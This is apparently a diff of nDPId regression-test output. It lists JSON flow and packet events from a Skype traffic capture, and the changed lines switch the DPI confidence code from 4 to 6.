00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431970703145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970703145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QUdAAEAGWu3AqAEi1KEIJMhzNFD26tn+1RsLHYAQECyxnAAAAQEICj4ykI8\/nFog"} 
-00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2032,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970703073,"flow_last_seen":1431970703221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1519,"flow_avg_l4_payload_len":151,"midstream":0,"thread_ts_msec":1431970703221,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2032,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970703073,"flow_last_seen":1431970703221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1519,"flow_avg_l4_payload_len":151,"midstream":0,"thread_ts_msec":1431970703221,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2051,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970703073,"flow_last_seen":1431970703668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6438,"flow_avg_l4_payload_len":321,"midstream":0,"thread_ts_msec":1431970703668,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970704329,"flow_last_seen":1431970704329,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970704329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431970704329,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970704329,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHThAAEAGppnAqAEilQ0gD8h0NFB7qA8CAAAAALAC\/\/9lUQAAAgQFtAEDAwUBAQgKPjKVIwAAAAAEAgAA"} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431970704371,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970704371,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHQNAtU7e6gPA6ASOJA1ewAAAgQFrAQCCAo\/gOZ\/PjKVIwEDAwk="} 
@@ -948,17 +951,17 @@ 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1431970705942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970705942,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIgJAAEAGoc\/AqAEilQ0gD8h1NFDRK91BAAAAALAC\/\/87SwAAAgQFtAEDAwUBAQgKPjKbZQAAAAAEAgAA"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1431970705984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970705984,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHXO868x0SvdQqASOJBt+QAAAgQFrAQCCAo\/gOgTPjKbZQEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431970705984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970705984,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iDxAAEAGO6HAqAEilQ0gD8h1NFDRK91CzvOvMoAQECzE+QAAAQEICj4ym48\/gOgT"} 
-00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2091,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970705942,"flow_last_seen":1431970706029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1431970706029,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2091,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970705942,"flow_last_seen":1431970706029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1431970706029,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707102,"flow_last_seen":1431970707102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970707102,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1431970707102,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970707102,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/2lAAEAGnL7AqAEi1KEIJMh2NFCv5GiXAAAAALAC\/\/+lEAAAAgQFtAEDAwUBAQgKPjKf5wAAAAAEAgAA"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2117,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1431970707176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970707176,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHapD3vnr+RomKASOJCFFQAAAgQFrAQCCAo\/p5PEPjKf5wEDAwk="} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2118,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431970707176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970707176,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qAZAAEAG9C3AqAEi1KEIJMh2NFCv5GiYqQ976IAQECzb9gAAAQEICj4yoDA\/p5PE"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1431970707911,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970707911,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu+nsAAEAR9XPAqAEihexDGTLdwCsAGiMOfdMCo1rvIegrMqRysYXm5vlz"} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708715,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431970708715,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970708715,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWHtAAEAGQ63AqAEi1KEIJMh3NFBvQ5mUAAAAALAC\/\/+uawAAAgQFtAEDAwUBAQgKPjKmLwAAAAAEAgAA"} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -970,39 +973,39 @@ 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687262,"flow_last_seen":1431970707409,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 